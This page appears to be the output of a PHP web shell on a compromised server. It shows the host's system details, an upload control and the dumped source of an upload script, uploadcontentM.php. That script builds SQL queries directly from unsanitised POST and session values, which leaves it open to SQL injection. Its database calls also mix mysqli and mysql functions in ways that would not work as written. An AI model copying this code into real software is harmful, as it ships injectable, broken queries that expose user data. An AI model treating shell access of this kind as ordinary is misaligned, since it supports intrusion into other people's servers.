( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/uploadcontentM.php
 <?php   
 
 $rs_settings = mysqli_query($link,"select * from users where catalogid='$_SESSION[euserid]'");
 
$VideoPath = "uploads/reporta/";
$live_img = 'uploads/images/';
$videouser = $_SESSION['euserid'];

//no error reporting
//@error_reporting(0);


if($_POST['doSave'] == 'Save')  {
mysqli_query("UPDATE users SET `description` = '$_POST[description]',`tel` = '$_POST[tel]',`category` = '$_POST[category]' WHERE catalogid='$_SESSION[euserid]'") or die(mysql_error());

/*header("Location: batch.php?msg=Category+Sucessfully+Saved");*/
 }
 
 
 if (empty($page)){
$page = 0;
}
$record = 20;

if ($Delnews==$admin_yes) {
 $newsid = $db->base64url_decode($newsid); 
$db->delnews($newsid,$VideoPath);
}


$result = $db->getcatalognews($page,$record,$catid);
 
 $rs_all = mysqli_query("select count(*) as total_all from usercontent where catalogid=$videouser") or die(mysql_error());

list($allvids) = mysql_fetch_row($rs_all);
 
 
 ?>

 
<style type="text/css">
<!--


@charset "utf-8";
/* CSS Document */
.uploadifyQueueItem {
	text-align:left;
font: 11px Verdana, Geneva, sans-serif;
color:#FFF;
	border: 0px solid #E5E5E5;
 
	padding: 5px;
	width:620px;
}.uploadsid {
	font: 10px Verdana, Geneva, sans-serif;
	border:0px solid #E5E5E5;
	 
	margin-top: 5px;
	padding: 5px;
	width:620px;
}
.uploadifyError {
	border: 1px solid #FBCBBC !important;
	background-color: #FDE5DD !important;
}
.uploadifyQueueItem .cancel {
	float: right;
	margin-top:16px
}
.uploadifyProgress {
	 
background-image:url(images/uploadifyProgress.png);
	background-repeat:no-repeat;
	margin-top: 5px;
	width:587px;
	
}
.uploadifyProgressBar {
	background-image:url(images/uploadifyProgressBar.png);
	background-repeat:no-repeat;
	
	width: 1px;
	height: 19px;
}
 
#fileQueue {
		width:100%;
	height:auto;
	
}


.style7 {font-size: 10px}
.style8 {font-size: 11px}
-->
</style>
 

<script type="text/javascript" src="v/scripts/swfobject.js"></script>
<script type="text/javascript" src="v/scripts/jqueryReporter.js"></script>
<script src="Scripts/swfobject_modified.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function() {
	$("#uploadify").uploadify({
		'uploader'       : 'v/scripts/uploadify.swf',
		'script'         : 'v/reportuploaderM.php',
		'cancelImg'      : 'v/images/cancel.png',
		'folder'         : 'v/uploads/reporta',
		'width'         : '155',
		'height'         : '58',
		'queueID'        : 'fileQueue',
		
		'auto'           : true,
		'queueSizeLimit'           : 10,
		'fileDesc'        : "Select videos and pictures to upload",
		'fileExt'        : '*.flv;*.mp4;*.mp3;*.avi;*.3gp;*.wma;*.mov;*.m4v;*.qt;*.rm;*.mpeg;*.divx;*.asf;*.png;*.jpg;*.pdf;*.jpeg;*.gif',
		'checkScript'           : 'v/checkfile.php',
	'scriptData' : {'u': '<?php echo $catalogid5; ?>-<?php echo $_SESSION['euserid']; ?>'},
		'multi'          : true
	});
});
</script>

<script language="JavaScript" type="text/javascript" src="v/js/jquery.validate.js"></script>

  <script>
  $(document).ready(function(){
    $("#myform").validate();
	
  });
  </script>
 
 <style type="text/css">
 
.style1 {
 
	font-weight: bold;
}
.style3 {font-size: 10px}

.even { background-color:#f2f2f2; }
.odd { background-color:#cccccc;
color:#000000 }

</style>   
<table  width="100%" height="482" border="0" cellpadding="0" cellspacing="0" id="bgme"  style="background-image: url(images/tuva.png); background-position:bottom; background-repeat:no-repeat">
	<tr>
		<td valign="top" height="54">
        
       <span id="status"> <img src="images/status/upload.png" width="503" height="54" /></span><!--<img src="images/status/uploading.png" width="503" height="54" />--><!--<img src="images/status/successful.png" width="503" height="54" />-->
<div id="done"></div>
<div id="fileQueue"></div></td>
	</tr>
	<tr>
		<td valign="top"   width="100%" height="482" >
        <span id="fire" > <center><img src="images/uploadcontent_08.png" style="margin-top:60px" /></center></span>
<?php   
	  require("v/channel/restreportercorporates.php");
			  ?>
        <span id="picit" ></span> 
        <object id="FlashID" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"  style="display:none; visibility:hidden; margin-top:100px " width="100%" height="300">
          <param name="movie" value="images/prog.swf" />
          <param name="quality" value="high" />
          <param name="wmode" value="opaque" />
          <param name="swfversion" value="6.0.65.0" />
          <!-- This param tag prompts users with Flash Player 6.0 r65 and higher to download the latest version of Flash Player. Delete it if you don’t want users to see the prompt. -->
          <param name="expressinstall" value="Scripts/expressInstall.swf" />
          <!-- Next object tag is for non-IE browsers. So hide it from IE using IECC. -->
          <!--[if !IE]>-->
          <object type="application/x-shockwave-flash" data="images/prog.swf" width="100%" height="300">
            <!--<![endif]-->
            <param name="quality" value="high" />
            <param name="wmode" value="opaque" />
            <param name="swfversion" value="6.0.65.0" />
            <param name="expressinstall" value="Scripts/expressInstall.swf" />
            <!-- The browser displays the following alternative content for users with Flash Player 6.0 and older. -->
            <div>
              <h4>Content on this page requires a newer version of Adobe Flash Player.</h4>
              <p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p>
            </div>
            <!--[if !IE]>-->
          </object>
          <!--<![endif]-->
        </object>
       
		 </td>
	</tr>
</table>
     <script type="text/javascript">
swfobject.registerObject("FlashID");
     </script>